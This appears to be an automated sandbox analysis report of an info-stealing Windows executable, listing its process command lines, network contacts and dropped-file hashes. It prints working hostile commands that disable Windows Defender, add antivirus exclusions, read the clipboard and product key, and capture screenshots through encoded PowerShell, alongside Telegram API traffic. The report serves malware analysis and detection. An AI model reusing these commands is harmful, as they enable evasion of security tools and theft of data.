| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe
"C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe"
C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe
"C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ruqm4wdt\ruqm4wdt.cmdline"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5A07.tmp" "c:\Users\Admin\AppData\Local\Temp\ruqm4wdt\CSC8C309A8C3D16475DB646CB548D933F4.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI24322\rar.exe a -r -hp"Damon@123#" "C:\Users\Admin\AppData\Local\Temp\2gdsV.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI24322\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI24322\rar.exe a -r -hp"Damon@123#" "C:\Users\Admin\AppData\Local\Temp\2gdsV.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 52.111.229.48:443 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\_MEI24322\python311.dll
| MD5 | 64fe8415b07e0d06ce078d34c57a4e63 |
| SHA1 | dd327f1a8ca83be584867aee0f25d11bff820a3d |
| SHA256 | 5d5161773b5c7cc15bde027eabc1829c9d2d697903234e4dd8f7d1222f5fe931 |
| SHA512 | 55e84a5c0556dd485e7238a101520df451bb7aab7d709f91fdb0709fad04520e160ae394d79e601726c222c0f87a979d1c482ac84e2b037686cde284a0421c4d |
C:\Users\Admin\AppData\Local\Temp\_MEI24322\VCRUNTIME140.dll
| MD5 | 870fea4e961e2fbd00110d3783e529be |
| SHA1 | a948e65c6f73d7da4ffde4e8533c098a00cc7311 |
| SHA256 | 76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644 |
| SHA512 | 0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88 |
memory/4688-25-0x00007FF916D20000-0x00007FF917309000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI24322\base_library.zip
| MD5 | 9dc12ea9f7821873da74c772abb280f0 |
| SHA1 | 3f271c9f54bc7740b95eaa20debbd156ebd50760 |
| SHA256 | c5ec59385bfac2a0ac38abf1377360cd1fddd05c31f8a8b4e44252e0e63acb10 |
| SHA512 | a3175c170bbb28c199ab74ad3116e71f03f124d448bf0e9dd4afcacdc08a7a52284cf858cfd7e72d35bd1e68c6ba0c2a1a0025199aeb671777977ea53e1f2535 |
C:\Users\Admin\AppData\Local\Temp\_MEI24322\_ctypes.pyd
| MD5 | 26e65481188fe885404f327152b67c5e |
| SHA1 | 6cd74c25cc96fb61fc92a70bdfbbd4a36fda0e3d |
| SHA256 | b76b63e8163b2c2b16e377114d41777041fcc948806d61cb3708db85cca57786 |
| SHA512 | 5b58fc45efebc30f26760d22f5fe74084515f1f3052b34b0f2d1b825f0d6a2614e4edaf0ce430118e6aaaf4bb8fcc540699548037f99a75dd6e53f9816068857 |
C:\Users\Admin\AppData\Local\Temp\_MEI24322\libffi-8.dll
| MD5 | 87786718f8c46d4b870f46bcb9df7499 |
| SHA1 | a63098aabe72a3ed58def0b59f5671f2fd58650b |
| SHA256 | 1928574a8263d2c8c17df70291f26477a1e5e8b3b9ab4c4ff301f3bc5ce5ca33 |
| SHA512 | 3abf0a3448709da6b196fe9238615d9d0800051786c9691f7949abb3e41dfb5bdaf4380a620e72e1df9e780f9f34e31caad756d2a69cad894e9692aa161be9f7 |
memory/4688-30-0x00007FF91B980000-0x00007FF91B9A4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI24322\_ssl.pyd
| MD5 | 0c06eff0f04b3193a091aa6f77c3ff3f |
| SHA1 | fdc8f3b40b91dd70a65ada8c75da2f858177ca1b |
| SHA256 | 5ecfe6f6ddf3b0a150e680d40c46940bc58334d0c622584772800913d436c7e2 |
| SHA512 | 985974e1487bbb8f451588f648a4cf4d754dbfc97f1ab4733dd21cdeb1a3abad017c34ed6ee4bc89ac01ea19b6060ea8f817693336133d110b715c746d090e49 |
C:\Users\Admin\AppData\Local\Temp\_MEI24322\_sqlite3.pyd
| MD5 | 00a246686f7313c2a7fe65bbe4966e96 |
| SHA1 | a6c00203afab2d777c99cc7686bab6d28e4f3f70 |
| SHA256 | cd3ade57c12f66331cb4d3c39276cbb8b41176026544b1ca4719e3ce146efe67 |
| SHA512 | c0e0f03616336f04678a0a16592fdc91aaa47c9bf11500a5dc3696aef4481f2fcbd64a82be78b30f3ffd4372c9e505edb000bdf05f2ad07bac54a457bb20bf7e |
C:\Users\Admin\AppData\Local\Temp\_MEI24322\_socket.pyd
| MD5 | abe1268857e3ace12cbd532e65c417f4 |
| SHA1 | dd987f29aabc940f15cd6bd08164ff9ae95c282f |
| SHA256 | 7110390fa56833103db0d1edbfd2fe519dd06646811402396eb44918b63e70d5 |
| SHA512 | 392ac00c9d9e5440a8e29e5bae3b1a8e7ffb22a01692dad261324058d8ef32fedf95e43a144b7e365f7f0fedb0efb6f452c7ccaee45e41e2d1def660d11173c1 |
C:\Users\Admin\AppData\Local\Temp\_MEI24322\_queue.pyd
| MD5 | 3f13115b323fb7516054ba432a53e413 |
| SHA1 | 340b87252c92c33fe21f8805acb9dc7fc3ff8999 |
| SHA256 | 52a43a55458c7f617eb88b1b23874f0b5d741e6e2846730e47f09f5499dda7f2 |
| SHA512 | 6b0383ee31d9bb5c1227981eb0ae5bb40e2d0a540bd605d24e5af455fd08935d726e5f327787d9340950311d8f7a655a7ea70635e1f95d33e089505f16ae64b9 |
C:\Users\Admin\AppData\Local\Temp\_MEI24322\_lzma.pyd
| MD5 | 8bdd52b7bcab5c0779782391686f05c5 |
| SHA1 | 281aad75da003948c82a6986ae0f4d9e0ba988eb |
| SHA256 | d5001fbee0f9c6e3c566ac4d79705ba37a6cba81781eee9823682de8005c6c2a |
| SHA512 | 086c5e628b25bc7531c2e2f73f45aa8f2182ac12f11f735b3adc33b65a078a62f7032daa58cc505310b26b4085cae91cb4fa0a3225fbe6f2b2f93287fee34d4c |
C:\Users\Admin\AppData\Local\Temp\_MEI24322\_hashlib.pyd
| MD5 | 82d28639895b87f234a80017a285822a |
| SHA1 | 9190d0699fa2eff73435adf980586c866639205f |
| SHA256 | 9ec1d9abac782c9635cdbbb745f6eab8d4c32d6292eebb9efd24a559260cb98e |
| SHA512 | 4b184dcc8ccf8af8777a6192af9919bcebcdcddd2a3771ed277d353f3c4b8cb24ffa30e83ff8fbeca1505bf550ea6f46419a9d13fef7d2be7a8ac99320350cfe |
C:\Users\Admin\AppData\Local\Temp\_MEI24322\_decimal.pyd
| MD5 | 072e08b39c18b779446032bf2104247b |
| SHA1 | a7ddad40ef3f0472e3c9d8a9741bd97d4132086c |
| SHA256 | 480b8366a177833d85b13415e5bb9b1c5fda0a093ea753940f71fa8e7fc8ed9b |
